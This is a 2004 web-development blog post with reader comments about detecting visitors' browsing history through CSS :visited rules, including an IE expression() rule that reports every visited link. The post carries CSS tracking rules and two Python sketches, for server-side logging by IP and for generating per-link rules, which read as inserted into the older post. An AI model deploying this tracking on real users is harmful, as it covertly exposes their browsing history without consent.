milov.nl

Interaction design • webdevelopment • web art • photography

May 2004

using :visited and expression() to detect any visited link

There's been some talk (see Anne, CollyLogic) about it being possible to use the :visited pseudo-class and background-image urls to detect if a user has visited a particular link.

Luckily, Internet Explorer users are unaffected by that method, because IE doesn't support the [href=] attribute selector. Unfortunately, there's another method that does work in IE and is even more dangerous...

The original (non-IE compatible) idea is to include a bunch of rules like these in the stylesheet:
a[href="http://slashdot.org/"]:visited {
  background-image: url(tracker.php?url=slashdot.org);
}

a[href="http://metafilter.com/"]:visited {
  background-image: url(tracker.php?url=metafilter.com);
}
(tracker.php is some server-side script that logs the url and ip-address, enabling the site owner to see which of his visitors have visited slashdot.org or metafilter.com.)

The code below, however, not only works in Internet Explorer: because it uses the IE-only expression() syntax to dynamically append the href to the fake image url, it can be used to track all visited links, forgoing the need to specify a separate rule for each link:
a:visited {
  background-image:
  expression('url(tracker.php?url='+this.href+')');
}
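
For illustration, the server side of either variant might look roughly like the sketch below. It is written in Python rather than PHP, and the names extract_tracked_url and record_hit are hypothetical, not taken from any real tracker.php. It assumes the script only needs to pair the requesting ip-address with whatever follows url= in the request; since expression() appends this.href unencoded, the sketch takes everything after url= instead of parsing separate query parameters.

```python
from typing import List, Optional, Tuple
from urllib.parse import unquote, urlsplit


def extract_tracked_url(request_target: str) -> Optional[str]:
    """Return whatever follows 'url=' in the request's query string, or None."""
    query = urlsplit(request_target).query
    prefix = "url="
    if not query.startswith(prefix):
        return None
    # The href may itself contain '?' and '&', so keep the whole remainder.
    return unquote(query[len(prefix):])


def record_hit(log: List[Tuple[str, str]], client_ip: str, request_target: str) -> bool:
    """Append (ip, visited url) to the log; return False if nothing was tracked."""
    url = extract_tracked_url(request_target)
    if url is None:
        return False
    log.append((client_ip, url))
    return True


if __name__ == "__main__":
    hits: List[Tuple[str, str]] = []
    record_hit(hits, "192.0.2.1", "/tracker.php?url=slashdot.org")
    record_hit(hits, "192.0.2.1", "/tracker.php?url=http://example.com/?a=1&b=2")
    for ip, url in hits:
        print(ip, url)
```

Each request for the fake background image then becomes one log entry saying that this visitor has the given link in their history.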


Thiemo wrote on 2004/05/26:
What's so dangerous about this? You can do the same since HTML 1.0:

<a href="tracker.php?url=slashdot.org">


P01 wrote on 2004/05/26:
It's possible to extract all the URLs from the HTML markup to create the corresponding CSS rules for the standards-compliant browsers, and finally send the HTML plus the extra CSS rules to the client.

Indeed, if the tracker.php script goes recursively through the pages visited by the user, it can reveal some really valuable information (imagine the extra income an ad system could ask for if it implemented that sort of sniffer) and eventually open a breach in sites that authenticate via parameters sent in GET (which is, in any case, a security no-no).

The violation of privacy could reach a larger scale if the spamming companies used that exploit (if they don't already) in their mails.
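
The first point in this comment, generating one :visited rule per link found in the page, could be sketched roughly as follows. This is a minimal Python illustration, not P01's actual code: HrefCollector and visited_rules are hypothetical names, and the tracker.php?url= pattern is simply borrowed from the post above.

```python
from html.parser import HTMLParser
from urllib.parse import quote


class HrefCollector(HTMLParser):
    """Collect the distinct href values of <a> tags, in document order."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        for name, value in attrs:
            if name == "href" and value and value not in self.hrefs:
                self.hrefs.append(value)


def visited_rules(html, tracker="tracker.php"):
    """Build one a[href="..."]:visited rule per link found in the markup."""
    collector = HrefCollector()
    collector.feed(html)
    collector.close()
    rules = []
    for href in collector.hrefs:
        # Escape backslashes and quotes so the href is a valid CSS string.
        selector_value = href.replace("\\", "\\\\").replace('"', '\\"')
        rules.append(
            'a[href="%s"]:visited {\n'
            '  background-image: url("%s?url=%s");\n'
            "}" % (selector_value, tracker, quote(href, safe=""))
        )
    return "\n\n".join(rules)


if __name__ == "__main__":
    page = '<p><a href="http://slashdot.org/">/.</a> <a href="http://metafilter.com/">MeFi</a></p>'
    print(visited_rules(page))
```

Unlike the hand-written rules in the post, the sketch percent-encodes the href in the tracker url, so links that contain their own query strings survive intact.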


milov wrote on 2004/05/26:
Thiemo, the big difference is that with this technique, the visitor doesn't *click* on a link at all. Simply loading a page of links is enough to alert the site owner of which of those links the current visitor has visited before.


Jan! wrote on 2004/05/26:
Also, if you're serving dynamic pages anyway, you can just as well add an id attribute to every link, and style it in CSS with: #link857456 { background: url(tracker.php?id=link857456) }

Apart from that, I don't get why everyone's upset all of a sudden when this has been known (and applied) for years.


Thiemo wrote on 2004/05/26:
Whether or not a particular URL is in my browser's history does not mean anything. (What's important here: You can't read the history. Instead, you have to know the URL first!) Turn off your internet connection if you are afraid of being tracked.


milov wrote on 2004/05/26:
Jan!: You're right, with a dynamic site this whole expression() trick isn't really needed. And I wouldn't say I'm 'upset' or worried, just disappointed I didn't discover this cool (and indeed rather obvious) trick earlier ;)


Andrew Clover wrote on 2004/05/27:
Indeed known about for some time. I mentioned this issue in a post to Bugtraq a few years ago:

http://www.doxdesk.com/personal/posts/bugtraq/20020214-css.html

There is no obvious good solution.